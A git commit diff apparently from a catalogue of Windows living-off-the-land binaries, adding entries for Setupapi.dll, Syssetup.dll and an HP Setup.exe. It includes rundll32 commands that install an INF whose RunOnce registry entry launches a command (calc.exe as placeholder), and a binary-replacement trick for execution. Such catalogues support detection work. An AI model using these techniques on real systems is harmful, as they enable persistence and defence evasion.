Merge pull request #16 from giMini/master

Setup.exe added (HP) + Syssetup.dll + Setupapi.dll
2018-05-11 09:04:04 +02:00 · 2018-05-11 09:04:04 +02:00 · a8bbbcbaae
parent f87f849e7c ea06a6c466
commit a8bbbcbaae
6 changed files with 129 additions and 2 deletions
--- a/LOLBins.md
+++ b/LOLBins.md
@ -94,4 +94,5 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Nvudisp.exe](OtherBinaries/Nvudisp.md)    
 [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)     
 [Usbinst.exe](OtherBinaries/Usbinst.md)     
-[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.md) 
+[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.md)     
+[Setup.exe](OtherBinaries/Setup.md) - Launches HP Installer for HP LaserJet Enterprise 700 color MFP M775 Printer Series Full Software and Drivers    
--- a/LOLLibs.md
+++ b/LOLLibs.md
@ -9,7 +9,9 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Ieframe.dll](OSLibraries/Ieframe.md)    
 [Pcwutl.dll](OSLibraries/Pcwutl.md)    
 [Shdocvw.dll](OSLibraries/Shdocvw.md)    
+[Zipfldr.dll](OSLibraries/Zipfldr.md)    
 [Shell32.dll](OSLibraries/Shell32.md)    
+[Setupapi.dll](OSLibraries/Setupapi.md)    
 [Url.dll](OSLibraries/Url.md)    
 [Zipfldr.dll](OSLibraries/Zipfldr.md)    
   
--- a/OSLibraries/Setupapi.md
+++ b/OSLibraries/Setupapi.md
@ -0,0 +1,46 @@
+## Setupapi.dll
+
+* Functions: Execute
+
+```
+rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
+```
+
+Acknowledgements:
+* Pierre-Alexandre Braeken - @pabraeken
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/pabraeken/status/994742106852941825
+
+Full path:
+```
+c:\windows\system32\Setupapi.dll
+c:\windows\sysWOW64\Setupapi.dll
+```
+
+
+Notes:
+calc.inf
+```
+; DRIVER.INF
+; Copyright (c) Microsoft Corporation.  All rights reserved.
+ 
+[Version]
+Signature = "$CHICAGO$"
+Class=61883
+ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
+Provider=%Msft%
+DriverVer=06/21/2006,6.1.7600.16385
+ 
+[DestinationDirs]
+DefaultDestDir = 1
+ 
+[DefaultInstall]
+AddReg = CalcStart
+
+[CalcStart]
+HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""
+```
--- a/OSLibraries/Syssetup.md
+++ b/OSLibraries/Syssetup.md
@ -0,0 +1,51 @@
+## Syssetup.dll
+
+* Functions: Execute
+
+```
+rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
+```
+
+Acknowledgements:
+* Pierre-Alexandre Braeken - @pabraeken
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/pabraeken/status/994392481927258113
+
+Full path:
+```
+c:\windows\system32\Syssetup.dll
+c:\windows\sysWOW64\Syssetup.dll
+```
+
+Notes:
+calc.inf
+```
+; DRIVER.INF
+; Copyright (c) Microsoft Corporation.  All rights reserved.
+ 
+[Version]
+Signature = "$CHICAGO$"
+Class=61883
+ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
+Provider=%Msft%
+DriverVer=06/21/2006,6.1.7600.16385
+ 
+[DestinationDirs]
+DefaultDestDir = 1
+ 
+[DefaultInstall]
+AddReg = CalcStart
+
+[CalcStart]
+HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""
+```
+
+
+
+Detection:
+
+ 
--- a/OtherBinaries/ROCCAT_Swarm.md
+++ b/OtherBinaries/ROCCAT_Swarm.md
@ -2,7 +2,9 @@

 * Prerequisites

-Replace OCCAT_Swarm_Monitor.exe with your binary.exe
+```
+Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
+```

 * Functions: Execute

--- a/OtherBinaries/Setup.md
+++ b/OtherBinaries/Setup.md
@ -0,0 +1,25 @@
+## Setup.exe
+
+* Prerequisites
+
+Replace hpbcsiServiceMarshaller.exe.exe with your binary.exe in C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315\Installer
+
+* Functions: Execute
+
+```
+Run Setup.exe   
+```
+
+Acknowledgements:
+* Pierre-Alexandre Braeken - @pabraeken
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/pabraeken/status/994381620588236800
+
+Full path:
+```
+C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
+```